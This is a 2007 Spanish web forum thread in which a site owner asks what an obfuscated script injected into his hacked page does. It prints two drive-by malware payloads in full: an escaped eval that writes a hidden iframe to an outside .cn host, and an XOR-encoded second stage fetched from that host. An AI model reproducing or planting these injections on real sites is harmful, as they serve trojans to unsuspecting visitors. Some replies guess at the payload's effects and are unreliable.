script en web hackeada

mrgubu · #1 (**permalink**) 05/12/2007, 13:34

Me han hackeado una página.

La web está en ASP, pero lo que han hecho es inyectar justo debajo de la etiqueta body un script que no sé lo que hace, y me gustaría saberlo.

El script viene como encriptado, no sé si hay forma de desencriptarlo y saber lo que hace:

Código PHP:

  <script>eval(unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%38%38%62%61%61%32%62%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%72%61%6d%6f%6e%65%79%6d%61%79%6b%65%72%2e%63%6e%2f%73%65%6c%6c%2e%70%68%70%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%33%38%30%35%32%29%2b%27%38%5c%27%20%77%69%64%74%68%3d%33%30%32%20%68%65%69%67%68%74%3d%31%32%36%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29")); </script>

Panino5001 · #2 (**permalink**) 05/12/2007, 13:46

Crea un iframe invisible cuyo src es http://ramoneymayker.cn/sell.php
Para comprobar el contenido basta con que ejecutes esto en el navegador:

Código:

<script>alert(unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%38%38%62%61%61%32%62%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%72%61%6d%6f%6e%65%79%6d%61%79%6b%65%72%2e%63%6e%2f%73%65%6c%6c%2e%70%68%70%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%33%38%30%35%32%29%2b%27%38%5c%27%20%77%69%64%74%68%3d%33%30%32%20%68%65%69%67%68%74%3d%31%32%36%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29")); </script>

mrgubu · #3 (**permalink**) 05/12/2007, 13:54

ok gracias,

lo que pasa es que el contenido de http://ramoneymayker.cn/sell.php es a su vez otro script. He probado a ejecutarlo, metiendolo en un html y ejecutandolo, pero no veo que ocurra nada, no sé lo que hace

anibal_cdf · #4 (**permalink**) 05/12/2007, 18:17

una vez en una web mia hicieron algo similar, y el script era como un FILE MANAGER pero q estaba en mi web , o sea como un ftp remoto para q hagan LO QUE QUIERAN

mrgubu · #5 (**permalink**) 06/12/2007, 05:14

Cuando la gente entra en la web, algunos obtienen un mensaje de los antivirus de su PC diciendo que la página en cuestión tiene un troyano.
Lo que me gustaría saber es si el hackeador puede obtener con dicho script datos de los PC donde se ejecuta la página.

anibal_cdf · #6 (**permalink**) 06/12/2007, 05:27

exactamente el antivirus cuando yo me descargue esos scripts a mi pc para "guardarlos" de backup me los tomaba como virus.

que yo sepa no, lo peor es que tu pagina de la puede borrar y quizas meter codigo dañino ...

mrgubu · #7 (**permalink**) 06/12/2007, 11:06

Gracias anibal_cdf.

¿Alquien podría decirme qué hace el script que hay en http://ramoneymayker.cn/sell.php?, es decir este script:

Código PHP:

  <script>function kz7s3t(logy48){var budhcy=new String(arguments.callee);budhcy=budhcy.replace(/[^a-z0-9()+_.,-]+/ig, "").toUpperCase(),ys7z9p=0,lqtw5e=0,o7mulg='',vru3lg=0;for(var gv4f37=0;gv4f37<budhcy.length;gv4f37++)vru3lg+=budhcy.charCodeAt(gv4f37,1);for(ys7z9p=0;ys7z9p<logy48.length;ys7z9p++){var b3myri=logy48[ys7z9p],au2t9k=budhcy.substr(lqtw5e,1).charCodeAt(0)^vru3lg;o7mulg+=String.fromCharCode(b3myri^au2t9k);lqtw5e++;if(lqtw5e==budhcy.length)lqtw5e=0}document.write(o7mulg);o7mulg=''}kz7s3t(new Array(29835,29901,29913,29888,29892,29909,29915,29855,29897,29913,29861,29855,29925,29901,29869,29897,29902,29836,29831,29930,29885,29881,29900,29913,29911,29906,29898,29908,29906,29907,29916,29918,29850,29893,29900,29834,29905,29913,29840,29919,29879,29854,29888,29905,29901,29827,29830,29848,29829,29892,29869,29907,29917,29912,29919,29915,29894,29884,29910,29910,29832,29833,29842,29919,29914,29888,29889,29905,29839,29849,29951,29899,29905,29896,29914,29912,29894,29833,29928,29838,29920,29890,29863,29870,29865,29876,29885,29946,29917,29869,29886,29921,29949,29904,29890,29865,29864,29925,29834,29841,29904,29888,29898,29917,29911,29907,29918,29891,29919,29880,29868,29884,29830,29889,29864,29828,29882,29888,29934,29876,29907,29838,29894,29889,29869,29835,29941,29946,29854,29856,29902,29893,29904,29907,29887,29896,29905,29888,29863,29903,29835,29937,29847,29897,29898,29885,29907,29912,29854,29831,29831,29869,29906,29867,29857,29865,29890,29850,29940,29833))</script>

anibal_cdf · #8 (**permalink**) 06/12/2007, 11:25

ese no se, el que yo tenia podia entrar por el browser y se abria eso q te digo yo